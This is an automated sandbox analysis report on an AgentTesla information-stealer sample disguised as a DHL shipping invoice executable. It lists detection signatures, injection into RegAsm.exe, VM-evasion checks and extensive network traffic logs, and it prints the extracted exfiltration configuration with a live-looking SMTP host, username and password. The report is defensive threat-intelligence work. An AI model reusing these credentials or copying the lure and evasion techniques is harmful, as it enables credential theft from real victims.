Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL- Shipping invoice.exe

Overview

General Information

Sample name:DHL- Shipping invoice.exe
Analysis ID:1407258
MD5:951577b697a1caf07eea6946c91fcd44
SHA1:83f57b94040ec26c3841c23d9fa2e3f90a742197
SHA256:be1cb45fa4e0e79812640a2b9631da54a8780e0a8e2730baaae76944712f4fd2
Tags:DHLexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: RegAsm connects to smtp port
Yara detected AgentTesla
Connects to many IPs within the same subnet mask (likely port scanning)
Connects to many ports of the same IP (likely port scanning)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Outbound RDP Connections Over Non-Standard Tools
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Suspicious Outbound Kerberos Connection
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses known network protocols on non-standard ports
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Connects to several IPs in different countries
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Suspicious Outbound SMTP Connections
Tries to load missing DLLs
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • DHL- Shipping invoice.exe (PID: 6484 cmdline: C:\Users\user\Desktop\DHL- Shipping invoice.exe MD5: 951577B697A1CAF07EEA6946C91FCD44)
    • RegAsm.exe (PID: 44380 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • WerFault.exe (PID: 44552 cmdline: C:\Windows\system32\WerFault.exe -u -p 6484 -s 123052 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.orako.co.ke", "Username": "ibiza@orako.co.ke", "Password": "ao655d3dSP[{"}
SourceRuleDescriptionAuthorStrings
00000002.00000002.2903520132.000000000291B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000002.00000002.2903520132.00000000028F1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000002.00000002.2903520132.00000000028F1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000002.00000002.2900244070.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000002.00000002.2900244070.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            2.2.RegAsm.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              2.2.RegAsm.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                2.2.RegAsm.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x34edf:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x34f51:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x34fdb:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x3506d:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x350d7:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x35149:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x351df:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x3526f:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

                Networking

                barindex
                Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 34.195.165.88, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 44380, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 55713

                System Summary

                barindex
                Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: C:\Users\user\Desktop\DHL- Shipping invoice.exe, ParentImage: C:\Users\user\Desktop\DHL- Shipping invoice.exe, ParentProcessId: 6484, ParentProcessName: DHL- Shipping invoice.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe, ProcessId: 44380, ProcessName: RegAsm.exe
                Source: Network ConnectionAuthor: Markus Neis: Data: DestinationIp: 45.67.210.47, DestinationIsIpv6: false, DestinationPort: 3389, EventID: 3, Image: C:\Users\user\Desktop\DHL- Shipping invoice.exe, Initiated: true, ProcessId: 6484, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49766
                Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 36.41.72.43, DestinationIsIpv6: false, DestinationPort: 7777, EventID: 3, Image: C:\Users\user\Desktop\DHL- Shipping invoice.exe, Initiated: true, ProcessId: 6484, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 50412
                Source: Network ConnectionAuthor: Ilyas Ochkov, oscd.community: Data: DestinationIp: 51.159.163.198, DestinationIsIpv6: false, DestinationPort: 88, EventID: 3, Image: C:\Users\user\Desktop\DHL- Shipping invoice.exe, Initiated: true, ProcessId: 6484, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 52256
                Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 195.178.56.33, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\Desktop\DHL- Shipping invoice.exe, Initiated: true, ProcessId: 6484, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49733
                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 160.248.80.91, DestinationIsIpv6: false, DestinationPort: 2525, EventID: 3, Image: C:\Users\user\Desktop\DHL- Shipping invoice.exe, Initiated: true, ProcessId: 6484, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 51990
                No Snort rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: DHL- Shipping invoice.exeAvira: detected
                Source: 2.2.RegAsm.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.orako.co.ke", "Username": "ibiza@orako.co.ke", "Password": "ao655d3dSP[{"}
                Source: DHL- Shipping invoice.exeReversingLabs: Detection: 28%
                Source: DHL- Shipping invoice.exeVirustotal: Detection: 38%Perma Link
                Source: DHL- Shipping invoice.exeJoe Sandbox ML: detected
                Source: unknownHTTPS traffic detected: 140.82.112.4:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.54.158:443 -> 192.168.2.4:55569 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 222.255.238.159:443 -> 192.168.2.4:55642 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:55711 version: TLS 1.2
                Source: DHL- Shipping invoice.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: System.Windows.Forms.pdb.Forms.pdbpdbrms.pdbm.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb source: DHL- Shipping invoice.exe, 00000000.00000002.2922767864.0000008B15942000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: assembly\GAC_MSC:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb2 source: DHL- Shipping invoice.exe, 00000000.00000002.2922767864.0000008B15942000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: .pdbY source: DHL- Shipping invoice.exe, 00000000.00000002.2922767864.0000008B15942000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: HC:\Windows\System.Windows.Forms.pdbY source: DHL- Shipping invoice.exe, 00000000.00000002.2922767864.0000008B15942000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: symbols\dll\System.Windows.Forms.pdbW0l source: DHL- Shipping invoice.exe, 00000000.00000002.2922767864.0000008B15942000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: indows.Forms.pdb source: DHL- Shipping invoice.exe, 00000000.00000002.2922767864.0000008B15942000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: Xindows.Forms.pdb source: DHL- Shipping invoice.exe, 00000000.00000002.2922767864.0000008B15942000.00000004.00000010.00020000.00000000.sdmp

                Networking

                barindex
                Source: global trafficTCP traffic: Count: 12 IPs: 212.110.188.189,212.110.188.211,212.110.188.222,212.110.188.213,212.110.188.202,212.110.188.220,212.110.188.198,212.110.188.193,212.110.188.195,212.110.188.204,212.110.188.216,212.110.188.207
                Source: global trafficTCP traffic: Count: 13 IPs: 103.47.93.248,103.47.93.214,103.47.93.236,103.47.93.213,103.47.93.223,103.47.93.219,103.47.93.196,103.47.93.250,103.47.93.194,103.47.93.233,103.47.93.242,103.47.93.231,103.47.93.252
                Source: global trafficTCP traffic: Count: 20 IPs: 188.132.222.171,188.132.222.194,188.132.222.141,188.132.222.168,188.132.222.197,188.132.222.7,188.132.222.166,188.132.222.167,188.132.222.9,188.132.222.3,188.132.222.52,188.132.222.44,188.132.222.66,188.132.222.5,188.132.222.51,188.132.222.40,188.132.222.38,188.132.222.12,188.132.222.23,188.132.222.14
                Source: global trafficTCP traffic: Count: 12 IPs: 162.159.242.109,162.159.242.7,162.159.242.10,162.159.242.252,162.159.242.230,162.159.242.150,162.159.242.62,162.159.242.45,162.159.242.8,162.159.242.158,162.159.242.104,162.159.242.159
                Source: global trafficTCP traffic: 18.135.133.116 ports 1,2,3,3128,8,80
                Source: global trafficTCP traffic: 13.234.24.116 ports 1080,1,2,3,3128,8
                Source: global trafficTCP traffic: 62.171.131.101 ports 25847,44827,29497,2,4,7,9
                Source: global trafficTCP traffic: 45.11.95.166 ports 6005,6016,6004,0,5,6,6008
                Source: global trafficTCP traffic: 163.172.166.35 ports 1,3,6,7,9,16379
                Source: global trafficTCP traffic: 45.11.95.165 ports 6021,6010,5020,6045,5043,5010,6003,5013,6038,5026,6004,0,2,5,5214,5038,5215,5029,5219
                Source: global trafficTCP traffic: 38.242.199.111 ports 5670,0,33458,5,6,7
                Source: global trafficTCP traffic: 183.96.235.105 ports 18572,1,2,5,7,8
                Source: global trafficTCP traffic: 51.158.98.197 ports 1,3,6,7,9,16379
                Source: global trafficTCP traffic: 107.180.95.177 ports 64731,1,3,4,6,7,1405
                Source: global trafficTCP traffic: 148.72.23.56 ports 42312,39396,3260,0,6,60069,9
                Source: global trafficTCP traffic: 94.131.14.66 ports 1080,1081,1,2,3,3128,8
                Source: global trafficTCP traffic: 164.92.86.113 ports 64110,57391,52494,1,55651,3,5,7,54597,9,50564,60283
                Source: global trafficTCP traffic: 162.214.102.195 ports 0,1,34227,58994,6,8,9,60891,50366
                Source: global trafficTCP traffic: 203.96.177.211 ports 12183,43839,22280,3,4,50187,55005,8,48553,9
                Source: global trafficTCP traffic: 107.180.88.173 ports 44568,4,5,35774,6,59820,8,36503,59609
                Source: global trafficTCP traffic: 166.62.38.100 ports 6322,8730,56191,2,3,6,32216
                Source: global trafficTCP traffic: 92.205.110.47 ports 17158,19600,1,5,7,8,36637
                Source: global trafficTCP traffic: 46.253.143.144 ports 1080,1,2,3,3128,8
                Source: global trafficTCP traffic: 37.187.77.58 ports 64494,49507,14470,21861,59870,31355,52593,1,3139,6,7,9,18936,13412,13574,37920,19767,10710,29380
                Source: global trafficTCP traffic: 92.204.135.37 ports 26927,63462,8623,11284,22942,0,58604,33521,4,5,6,8,20491,55019,33899,32524,34824
                Source: global trafficTCP traffic: 82.223.121.72 ports 15464,64871,11075,27137,1,2,3,60325,7
                Source: global trafficTCP traffic: 72.10.160.91 ports 18031,0,1,3,8,16995
                Source: global trafficTCP traffic: 72.10.160.90 ports 13083,25521,2573,25025,28317,29129,22379,29507,7481,13749,29287,2843,29247,1739,17471,9335,20105,30233,0,1,3,6,7,2475,18209,10367
                Source: global trafficTCP traffic: 163.172.129.251 ports 1,3,6,7,9,16379
                Source: global trafficTCP traffic: 207.248.108.129 ports 20185,0,1,2,5,8
                Source: global trafficTCP traffic: 51.15.209.188 ports 1,3,6,7,9,16379
                Source: global trafficTCP traffic: 128.199.221.91 ports 7176,8004,33383,21605,3,8
                Source: global trafficTCP traffic: 84.19.58.66 ports 42931,1,2,3,4,9
                Source: global trafficTCP traffic: 163.172.131.178 ports 1,3,6,7,9,16379
                Source: global trafficTCP traffic: 195.177.217.131 ports 31490,63643,58053,0,1,23380,3,4,60566,9
                Source: global trafficTCP traffic: 107.180.89.185 ports 0,49062,2,4,6,9
                Source: global trafficTCP traffic: 161.97.173.42 ports 62289,22653,3,5,52463,7,50386,5379,9,27172,53948
                Source: global trafficTCP traffic: 185.109.184.150 ports 1,53155,3,63819,56067,5
                Source: global trafficTCP traffic: 108.181.132.115 ports 57493,3,4,5,7,9
                Source: global trafficTCP traffic: 173.212.237.43 ports 17068,18001,64568,27324,64735,63614,62624,20009,20238,1,58964,26131,3,4,6,47275,13765
                Source: global trafficTCP traffic: 91.108.130.111 ports 0,2,3,32650,5,6
                Source: global trafficTCP traffic: 148.72.206.250 ports 14076,0,1,4,6,7,35703
                Source: global trafficTCP traffic: 37.187.91.192 ports 21981,27898,1,2,7,17605,11721
                Source: global trafficTCP traffic: 107.180.88.41 ports 37597,0,3,58037,5,57642,7,8
                Source: global trafficTCP traffic: 162.214.227.68 ports 36180,48414,45540,62249,44658,34071,51280,55392,2,3,52597,60313,55029,32188,5,31042,54047,56796,51126,9,53787,51923,37976
                Source: global trafficTCP traffic: 148.72.206.84 ports 0,30651,1,32347,2536,3,5,6,34761
                Source: global trafficTCP traffic: 161.97.163.52 ports 9045,18693,23288,40301,45725,32092,64109,30189,1,1798,3,31125,2677,28593,34586,6,29631,8,9,34916
                Source: global trafficTCP traffic: 103.28.121.58 ports 1,2,3,3128,8,80
                Source: global trafficTCP traffic: 132.148.16.169 ports 27718,41824,0,1,2,3,27399,55610,11320,52326
                Source: global trafficTCP traffic: 162.214.225.223 ports 54917,43435,63452,48414,49227,49556,58240,40536,0,55431,36129,3,53340,4,55029,51045,5,55742,50753,39824,36448
                Source: global trafficTCP traffic: 51.222.241.8 ports 49559,36219,1,2,62916,6,7822,9
                Source: global trafficTCP traffic: 213.226.11.149 ports 41878,59086,1,4,7,8
                Source: global trafficTCP traffic: 41.217.220.214 ports 0,2,3,32650,5,6
                Source: global trafficTCP traffic: 162.241.46.69 ports 3,34236,5,53783,7,8
                Source: global trafficTCP traffic: 208.87.131.240 ports 29624,41368,22566,2,4,6,9
                Source: global trafficTCP traffic: 75.119.200.27 ports 23456,2,3,4,5,6
                Source: global trafficTCP traffic: 54.36.122.16 ports 44587,17188,2,6,29796,7,9,39713
                Source: global trafficTCP traffic: 162.241.50.179 ports 49858,34099,57364,3,55693,4,5,6,7,53755,40170,62192
                Source: global trafficTCP traffic: 197.254.84.86 ports 0,2,3,32650,5,6
                Source: global trafficTCP traffic: 67.227.186.83 ports 56370,0,3,5,6,7
                Source: global trafficTCP traffic: 165.227.196.37 ports 53718,63742,61899,54266,2,56755,4,5,6
                Source: global trafficTCP traffic: 160.153.254.240 ports 48502,5552,1,1138,3,8
                Source: global trafficTCP traffic: 51.15.133.214 ports 1,3,6,7,9,16379
                Source: global trafficTCP traffic: 173.249.2.186 ports 45708,0,4,5,7,8
                Source: global trafficTCP traffic: 118.99.103.114 ports 32491,1,2,3,4,9
                Source: global trafficTCP traffic: 51.75.125.208 ports 48114,27029,40998,1,4,8,2736
                Source: global trafficTCP traffic: 138.201.21.218 ports 65032,0,2,3,5,6
                Source: global trafficTCP traffic: 146.59.18.246 ports 9986,15860,64741,20734,25810,58031,30673,1,4,6,7,49871
                Source: global trafficTCP traffic: 92.204.135.203 ports 34780,0,1,2,10824,4,29212,8
                Source: global trafficTCP traffic: 181.10.235.27 ports 0,3,4,56034,5,6
                Source: global trafficTCP traffic: 50.63.12.33 ports 9367,23859,45134,61464,0,1,25492,50781,5,7,22450,8,52814
                Source: global trafficTCP traffic: 5.196.111.30 ports 0,1,2,4,8,20481
                Source: global trafficTCP traffic: 148.66.130.187 ports 20962,5630,16320,0,2,6,9
                Source: global trafficTCP traffic: 222.74.65.84 ports 38051,0,1,3,5,8
                Source: global trafficTCP traffic: 80.65.28.57 ports 0,2,3,6,9,30924,30962
                Source: global trafficTCP traffic: 51.89.173.40 ports 27887,3100,44719,54570,23854,0,1,30199,5,8,51511,51612,11058,31724
                Source: global trafficTCP traffic: 50.63.13.3 ports 0,5,7,8,50887,14920,31503
                Source: global trafficTCP traffic: 51.158.78.200 ports 1,3,6,7,9,16379
                Source: global trafficTCP traffic: 159.223.71.71 ports 56581,59098,2,4,52542,61818,5,51187,51213,64193,51616,64151
                Source: global trafficTCP traffic: 34.93.157.87 ports 1,57821,2,5,7,8,8514
                Source: global trafficTCP traffic: 66.84.6.21 ports 62645,1,5,6,51996,9
                Source: global trafficTCP traffic: 66.228.33.190 ports 17464,7841,46648,1,4,6,7
                Source: global trafficTCP traffic: 213.136.79.177 ports 38772,0,2,56205,35358,5,6,13675
                Source: global trafficTCP traffic: 38.54.95.19 ports 8060,1,2,3,3128,9080,8
                Source: global trafficTCP traffic: 141.95.160.178 ports 18951,5870,10709,0,1,7,9,48223
                Source: global trafficTCP traffic: 88.99.138.21 ports 5088,5288,5279,0,5,8
                Source: global trafficTCP traffic: 118.71.66.50 ports 0,2,3,32650,5,6
                Source: global trafficTCP traffic: 162.214.121.173 ports 64579,44826,62976,35183,2,5,33572,7,52577,64382
                Source: global trafficTCP traffic: 92.205.61.38 ports 50903,48664,36073,0,3,6,7,4726
                Source: global trafficTCP traffic: 92.249.122.108 ports 61778,1,6,7,8,58749
                Source: global trafficTCP traffic: 162.241.46.40 ports 64353,41442,56241,60708,34172,0,50062,2,33268,5,6,60102,46097
                Source: global trafficTCP traffic: 47.90.200.204 ports 1,2,5,7,9,19527
                Source: global trafficTCP traffic: 69.167.169.46 ports 59091,0,1,12903,2,3,9
                Source: global trafficTCP traffic: 208.109.14.49 ports 37377,0,11426,34700,3,30993,9,42072
                Source: global trafficTCP traffic: 43.134.20.174 ports 15673,1,3,5,6,7
                Source: global trafficTCP traffic: 38.54.116.9 ports 1,2,3,3128,8,8118
                Source: global trafficTCP traffic: 91.150.77.58 ports 1,2,56921,5,6,9
                Source: global trafficTCP traffic: 66.228.35.209 ports 19497,1,4,7,9,36702
                Source: global trafficTCP traffic: 103.182.112.11 ports 8000,1,2,3,3128,8
                Source: global trafficTCP traffic: 212.83.138.60 ports 0,1,4,5,6,51640
                Source: global trafficTCP traffic: 132.148.128.88 ports 26606,8595,45883,20317,1,2,3,29313,39557,9,60781
                Source: global trafficTCP traffic: 5.252.23.220 ports 1080,1081,0,1,3128,8
                Source: global trafficTCP traffic: 107.180.90.88 ports 8078,21166,20309,0,2,3,55347,23880,9,7936
                Source: global trafficTCP traffic: 162.241.46.6 ports 62244,0,50062,2,5,6
                Source: global trafficTCP traffic: 37.187.73.7 ports 41385,23637,16113,1,3,4,5,33551,8,64052
                Source: global trafficTCP traffic: 117.83.173.216 ports 23456,2,3,4,5,6
                Source: global trafficTCP traffic: 148.72.215.79 ports 48623,63212,3,5,8,11423,38538,11546
                Source: global trafficTCP traffic: 66.228.37.252 ports 14321,14791,7841,56560,1,2,24360,3,4,29466
                Source: global trafficTCP traffic: 147.124.212.31 ports 11070,40234,55361,0,2,3,4,24230,36779,33526
                Source: global trafficTCP traffic: 213.32.66.64 ports 0,1,50163,3,5,6
                Source: global trafficTCP traffic: 216.10.242.18 ports 0,29057,2,5,7,30670,9
                Source: global trafficTCP traffic: 104.238.111.107 ports 5484,15073,45883,0,56225,2,30026,3,6,7999,53777
                Source: global trafficTCP traffic: 51.158.96.66 ports 1,3,6,7,9,16379
                Source: global trafficTCP traffic: 107.180.90.42 ports 0,1,6,7,10670,50339
                Source: global trafficTCP traffic: 43.255.113.232 ports 8083,8086,8084,0,4,8,80,84,86
                Source: global trafficTCP traffic: 197.234.13.52 ports 0,36902,2,3,6,9
                Source: global trafficTCP traffic: 38.133.200.94 ports 1,31596,3,5,6,9
                Source: global trafficTCP traffic: 154.16.116.166 ports 3,2512,5,7,9,39759
                Source: global trafficTCP traffic: 92.204.134.38 ports 25825,52929,7785,43044,25675,29718,4,56177,5,54467,6,7,30747,59727
                Source: global trafficTCP traffic: 128.199.196.31 ports 26579,0,1,2,51474,27102,7,38832
                Source: global trafficTCP traffic: 148.72.210.123 ports 20268,17499,0,2,33553,60796,6,8,54615
                Source: global trafficTCP traffic: 188.164.197.178 ports 5,55677,59378,6,7,3756
                Source: global trafficTCP traffic: 196.202.210.73 ports 0,2,3,32650,5,6
                Source: global trafficTCP traffic: 197.232.36.85 ports 41890,0,1,4,8,9
                Source: global trafficTCP traffic: 132.148.245.169 ports 19483,1,3,7,8,38117
                Source: global trafficTCP traffic: 103.113.71.230 ports 1080,1,2,3,3128,8
                Source: global trafficTCP traffic: 41.65.236.35 ports 1976,1,6,1981,7,9
                Source: global trafficTCP traffic: 67.43.227.228 ports 16495,6643,9039,27305,27743,2999,2,26163,1983,9,3857
                Source: global trafficTCP traffic: 67.43.227.227 ports 20385,7347,7335,17485,2295,21449,16829,3,4,1257,7,1929,4479,14553,1959,30613
                Source: global trafficTCP traffic: 200.54.194.13 ports 53281,1,2,3,5,8
                Source: global trafficTCP traffic: 31.24.44.92 ports 1,2,52173,3,5,7,50109
                Source: global trafficTCP traffic: 51.15.211.81 ports 1,3,6,7,9,16379
                Source: global trafficTCP traffic: 98.162.25.4 ports 1,31654,3,4,5,6
                Source: global trafficTCP traffic: 178.79.165.164 ports 30918,5422,35254,0,29990,5,7,60011,7507,36425
                Source: global trafficTCP traffic: 162.241.70.64 ports 63631,49478,62874,2,4,6,7,8
                Source: global trafficTCP traffic: 163.172.158.70 ports 1,3,6,7,9,16379
                Source: global trafficTCP traffic: 41.65.236.58 ports 1976,1,6,1981,7,9
                Source: global trafficTCP traffic: 75.119.145.169 ports 38023,61344,61553,1,2,3,5,53129,9,16216
                Source: global trafficTCP traffic: 67.43.228.254 ports 8895,1,4,32221,1487,7,8,19965,11535
                Source: global trafficTCP traffic: 67.43.228.253 ports 18017,18131,9921,19285,25105,29729,28991,10879,6601,11983,18145,25355,3273,1,14869,2,1521,5,1487,13873,8,9,14545,14223,11871
                Source: global trafficTCP traffic: 67.43.228.250 ports 18003,8193,1,3,4,7,14713,11765
                Source: global trafficTCP traffic: 104.248.158.78 ports 0,1,2,3,4,12403
                Source: global trafficTCP traffic: 148.72.209.174 ports 38088,39027,49816,0,1,64938,2,3,6,39458,2906,16203,4734
                Source: global trafficTCP traffic: 50.63.12.101 ports 61797,6095,0,32423,1,10647,4,6,7,17559
                Source: global trafficTCP traffic: 157.230.250.185 ports 17773,21301,39033,45630,25785,1,4,25363,5,61214,9,51499
                Source: global trafficTCP traffic: 139.162.238.184 ports 21017,39652,18177,4837,29870,3,4,7,8,11227
                Source: global trafficTCP traffic: 51.161.131.84 ports 63055,43712,1,58612,2,3,4,7,49202
                Source: global trafficTCP traffic: 178.62.229.24 ports 45603,0,3,4,5,6
                Source: global trafficTCP traffic: 117.160.250.163 ports 8080,8081,9990,0,80,9,81,9999,82,8828
                Source: global trafficTCP traffic: 51.75.126.150 ports 36580,19693,36694,15474,21803,64615,1,3,11802,4,35632,34144,4228,37847
                Source: global trafficTCP traffic: 209.126.104.38 ports 40053,15097,0,1,5,7,9,12457
                Source: global trafficTCP traffic: 186.215.87.194 ports 6010,6034,8896,6030,0,1,6,6007
                Source: global trafficTCP traffic: 103.215.139.32 ports 7480,3,4,6,7,6437
                Source: global trafficTCP traffic: 130.162.213.175 ports 8080,1,2,3129,3,3128,9
                Source: global trafficTCP traffic: 132.148.129.254 ports 9553,0,2,4,5,27045,7,60781
                Source: global trafficTCP traffic: 132.148.167.243 ports 49612,29514,40961,0,1,4,6,9,48298,28040
                Source: global trafficTCP traffic: 51.159.221.176 ports 63003,3,5,6,8,8635
                Source: global trafficTCP traffic: 92.205.28.245 ports 8560,0,53287,5,6,8
                Source: global trafficTCP traffic: 140.227.61.156 ports 23456,2,3,4,5,6
                Source: global trafficTCP traffic: 213.136.78.200 ports 28513,39272,0,40927,2,4,7,9,19925
                Source: global trafficTCP traffic: 67.43.236.20 ports 15493,6353,18375,15385,26359,26843,9351,20679,20997,24547,0,1,16829,2787,11729,8,10891,11023,9,19965,13009,19835
                Source: global trafficTCP traffic: 67.43.236.21 ports 2,4,29477,7,9,3787
                Source: global trafficTCP traffic: 51.15.223.12 ports 1,3,6,7,9,16379
                Source: global trafficTCP traffic: 72.10.164.178 ports 21245,20033,14079,5189,30181,2099,29129,2251,18053,12119,24593,14699,30589,12577,28709,9277,16147,5651,27733,2,3,10801,4,5,4653,9,1407,8837
                Source: global trafficTCP traffic: 162.241.45.22 ports 50528,44931,63501,57001,33082,0,2,3,55610,8
                Source: global trafficTCP traffic: 171.244.140.160 ports 15084,5189,62310,42968,24015,56076,36273,17081,0,11614,2,31643,27020,27696,27056,53882,7,37400,30119,53749,8826
                Source: global trafficTCP traffic: 31.200.242.201 ports 12196,9985,1,5,7,15755
                Source: global trafficTCP traffic: 162.214.121.11 ports 0,1,18809,2993,8,8989,9
                Source: global trafficTCP traffic: 51.158.64.130 ports 1,3,6,7,9,16379
                Source: global trafficTCP traffic: 162.214.197.102 ports 42019,0,1,2,4,58740,9,46430
                Source: global trafficTCP traffic: 167.86.69.142 ports 42214,36394,45364,44439,3,4,9
                Source: global trafficTCP traffic: 62.122.201.246 ports 0,1,2,5,9,50129
                Source: global trafficTCP traffic: 162.214.170.144 ports 37592,47558,16684,33394,25347,0,1,3,32233,7,39503,34617,31701
                Source: global trafficTCP traffic: 104.238.98.87 ports 45803,0,3,4,5,8
                Source: global trafficTCP traffic: 20.111.54.16 ports 8123,1,2,3,8,80
                Source: global trafficTCP traffic: 91.134.140.160 ports 20896,16487,48962,49687,2572,56495,27207,9141,32896,32588,1,53012,11946,30895,3,5,5401,51513,39803,12217,49042
                Source: global trafficTCP traffic: 160.153.245.187 ports 5784,38586,35573,42879,3,35138,5,6,8,6116,5436,31745
                Source: global trafficTCP traffic: 45.81.232.17 ports 41792,61553,9165,23711,34447,3,5709,4,7,47056,21481,14669,48085,4715
                Source: global trafficTCP traffic: 148.72.215.230 ports 9389,9790,3,8,9,48640
                Source: global trafficTCP traffic: 213.226.16.46 ports 1,2,3,51372,5,7
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 40961
                Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 3128
